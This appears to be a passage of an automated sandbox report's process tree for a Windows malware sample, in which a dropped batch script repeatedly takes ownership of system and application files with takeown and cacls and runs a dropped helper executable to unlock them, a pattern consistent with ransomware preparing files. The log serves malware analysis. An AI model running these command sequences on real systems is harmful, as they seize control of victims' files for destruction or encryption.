C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:4392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:4492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵
- Executes dropped EXE
PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
PID:4448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4980
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4240
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:5116
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:4904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wabmig.exe" -nobanner3⤵PID:3976
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:272
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:4460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:4996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "settings.dat" -nobanner3⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "settings.dat" -nobanner4⤵
- Executes dropped EXE
PID:2524
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:4932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:4456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:4408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "settings.dat" -nobanner3⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "settings.dat" -nobanner4⤵
- Executes dropped EXE
PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:4572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:4628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:5132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "superbar.png" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "superbar.png" -nobanner4⤵PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:5216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:5264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵
- Modifies file permissions
PID:5284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "edb.chk" -nobanner3⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "edb.chk" -nobanner4⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5368
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:5436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "device.png" -nobanner3⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "device.png" -nobanner4⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""2⤵PID:5520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C3⤵PID:5568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"3⤵
- Modifies file permissions
PID:5592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "utc.cert.json" -nobanner3⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "utc.cert.json" -nobanner4⤵PID:5628
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:5680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:5728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
- Modifies file permissions
PID:5748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5768
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:5832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:5900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "overlay.png" -nobanner3⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "overlay.png" -nobanner4⤵PID:5936
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""2⤵PID:5984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C3⤵PID:6032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"3⤵PID:6052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "utc.tracing.json" -nobanner3⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "utc.tracing.json" -nobanner4⤵PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""2⤵PID:6136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C3⤵PID:5180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"3⤵
- Modifies file permissions
PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "qmgr.jfm" -nobanner3⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "qmgr.jfm" -nobanner4⤵PID:4896
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:5292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:5352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
PID:5260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:5240
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:5448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:5512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:5400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:5588
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:5648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:5560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:5540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵PID:5764
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:5820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:5692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
PID:5892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:5956
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:5872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:6036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:6080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:6124
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:5996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
PID:4900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe" -nobanner3⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "WinMail.exe" -nobanner4⤵PID:5148
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:5356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Modifies file permissions
PID:5428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""2⤵PID:5580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C3⤵PID:5468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"3⤵
- Modifies file permissions
PID:5476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "utc.app.json" -nobanner3⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "utc.app.json" -nobanner4⤵PID:5552
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:5660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵
- Modifies file permissions
PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵PID:5940
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:5700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:6060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵
- Modifies file permissions
PID:6096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:6084
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:6040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:5136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:5212
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:5420
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:5328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:496
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:5236
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:5556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:5776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
PID:5572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:5828
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""2⤵PID:5944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C3⤵PID:5564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"3⤵
- Modifies file permissions
PID:5812
-
-
